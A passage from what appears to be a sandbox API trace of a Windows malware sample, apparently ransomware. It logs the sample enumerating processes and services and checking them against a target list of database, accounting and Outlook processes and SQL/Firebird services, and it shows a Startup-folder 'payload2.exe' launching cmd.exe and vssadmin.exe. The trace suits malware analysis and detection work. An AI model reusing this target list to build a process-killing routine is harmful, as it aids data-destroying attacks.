th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0047.304] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0047.305] lstrlenW (lpString="System") returned 6 [0047.305] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0047.305] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0047.305] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0047.305] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0047.305] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0047.305] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0047.305] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0047.305] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0047.305] lstrlenW (lpString="smss.exe") returned 8 [0047.305] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0047.306] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0047.306] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0047.306] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0047.306] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0047.306] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0047.306] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0047.306] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.306] lstrlenW (lpString="csrss.exe") returned 9 [0047.306] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0047.306] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0047.306] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0047.306] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0047.306] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0047.306] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0047.306] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0047.306] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0047.307] lstrlenW (lpString="wininit.exe") returned 11 [0047.307] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0047.307] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0047.307] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0047.307] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.308] lstrlenW (lpString="csrss.exe") returned 9 [0047.308] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0047.309] lstrlenW (lpString="winlogon.exe") returned 12 [0047.309] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0047.309] lstrlenW (lpString="services.exe") returned 12 [0047.309] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0047.310] lstrlenW (lpString="lsass.exe") returned 9 [0047.310] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0047.311] lstrlenW (lpString="lsm.exe") returned 7 [0047.311] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.313] lstrlenW (lpString="svchost.exe") returned 11 [0047.313] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.314] lstrlenW (lpString="svchost.exe") returned 11 [0047.314] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.314] lstrlenW (lpString="svchost.exe") returned 11 [0047.314] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.315] lstrlenW (lpString="svchost.exe") returned 11 [0047.315] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.316] lstrlenW (lpString="svchost.exe") returned 11 [0047.316] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0047.316] lstrlenW (lpString="audiodg.exe") returned 11 [0047.316] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.318] lstrlenW (lpString="svchost.exe") returned 11 [0047.318] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.319] lstrlenW (lpString="svchost.exe") returned 11 [0047.319] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0047.320] lstrlenW (lpString="dwm.exe") returned 7 [0047.320] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0047.321] lstrlenW (lpString="explorer.exe") returned 12 [0047.321] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0047.321] lstrlenW (lpString="spoolsv.exe") returned 11 [0047.321] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0047.322] lstrlenW (lpString="taskhost.exe") returned 12 [0047.322] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.323] lstrlenW (lpString="svchost.exe") returned 11 [0047.323] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0047.338] lstrlenW (lpString="taskeng.exe") returned 11 [0047.338] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0047.339] lstrlenW (lpString="taskhost.exe") returned 12 [0047.339] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0047.340] lstrlenW (lpString="challenging.exe") returned 15 [0047.340] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0047.341] lstrlenW (lpString="pgp prix.exe") returned 12 [0047.341] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0047.341] lstrlenW (lpString="user-reno.exe") returned 13 [0047.341] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0047.373] lstrlenW (lpString="aggregate.exe") returned 13 [0047.373] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0047.374] lstrlenW (lpString="dressed.exe") returned 11 [0047.374] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0047.374] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0047.374] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0047.375] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0047.375] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0047.376] lstrlenW (lpString="developing.exe") returned 14 [0047.376] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0047.376] lstrlenW (lpString="supported.exe") returned 13 [0047.376] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0047.377] lstrlenW (lpString="girlstionselect.exe") returned 19 [0047.377] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0047.377] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0047.377] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0047.378] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0047.378] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0047.379] lstrlenW (lpString="eating.exe") returned 10 [0047.379] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0047.379] lstrlenW (lpString="nh_protected.exe") returned 16 [0047.379] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0047.380] lstrlenW (lpString="vulnerability.exe") returned 17 [0047.380] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0047.381] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0047.381] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0047.381] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0047.381] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0047.382] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0047.382] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0047.382] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0047.383] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0047.383] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0047.383] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0047.384] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0047.384] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0047.384] lstrlenW (lpString="cmd.exe") returned 7 [0047.384] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0047.385] lstrlenW (lpString="conhost.exe") returned 11 [0047.385] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0047.399] lstrlenW (lpString="vssadmin.exe") returned 12 [0047.399] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0047.399] lstrlenW (lpString="VSSVC.exe") returned 9 [0047.399] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.400] lstrlenW (lpString="svchost.exe") returned 11 [0047.400] Process32NextW (in: hSnapshot=0x210, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0047.400] CloseHandle (hObject=0x210) returned 1 [0047.400] Sleep (dwMilliseconds=0x1f4) [0047.938] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3940708 [0047.939] EnumServicesStatusExW (in: hSCManager=0x3940708, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0047.939] GetLastError () returned 0xea [0047.939] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0047.939] EnumServicesStatusExW (in: hSCManager=0x3940708, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0047.940] CloseServiceHandle (hSCObject=0x3940708) returned 1 [0047.940] lstrlenW (lpString="Appinfo") returned 7 [0047.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0047.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0047.940] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0047.940] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0047.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0047.940] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0047.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0047.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0047.940] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0047.940] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0047.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0047.940] lstrlenW (lpString="AudioSrv") returned 8 [0047.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0047.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0047.940] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0047.940] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0047.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0047.940] lstrlenW (lpString="BFE") returned 3 [0047.940] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0047.940] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0047.940] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0047.940] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0047.940] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0047.940] lstrlenW (lpString="CryptSvc") returned 8 [0047.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0047.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0047.941] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0047.941] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0047.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0047.941] lstrlenW (lpString="CscService") returned 10 [0047.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0047.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0047.941] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0047.941] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0047.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0047.941] lstrlenW (lpString="DcomLaunch") returned 10 [0047.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0047.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0047.941] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0047.941] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0047.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0047.941] lstrlenW (lpString="Dhcp") returned 4 [0047.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0047.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0047.941] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0047.941] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0047.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0047.941] lstrlenW (lpString="Dnscache") returned 8 [0047.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0047.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0047.941] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0047.941] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0047.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0047.941] lstrlenW (lpString="DPS") returned 3 [0047.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0047.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0047.941] lstrcmpiW 